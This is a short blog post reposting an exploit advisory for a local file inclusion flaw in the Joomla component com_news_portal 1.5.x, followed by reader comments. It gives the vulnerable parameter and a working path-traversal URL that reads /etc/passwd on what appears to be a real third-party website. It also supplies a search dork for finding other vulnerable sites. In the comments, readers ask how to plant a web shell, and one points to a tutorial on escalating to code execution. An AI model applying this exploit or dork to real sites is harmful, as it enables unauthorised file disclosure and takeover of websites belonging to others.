LFI to RCE via access_log injection

Joomla Component News Portal LFI Vuln


[o] Joomla Component News Portal Local File Inclusion Vulnerability
Software : com_news_portal version 1.5.x
Vendor : http://www.ijoomla.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_news_portal&controller=[LFI]


[o] PoC
http://www.fight4romania.com/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_news_portal"



Comments

iful said…
cara memesukan shell na gmana y om
evilc0de said…
coba liat tutorial gw tentang LFI 2 RCE diblog ini juga bro.. disitu lengkap smua sampe upload phpshell ke target..
Anonymous said…
Problem solved in News Portal 1.5.10 version released today.
labatterie said…
Disitu lengkap smua sampe upload phpshell ke target..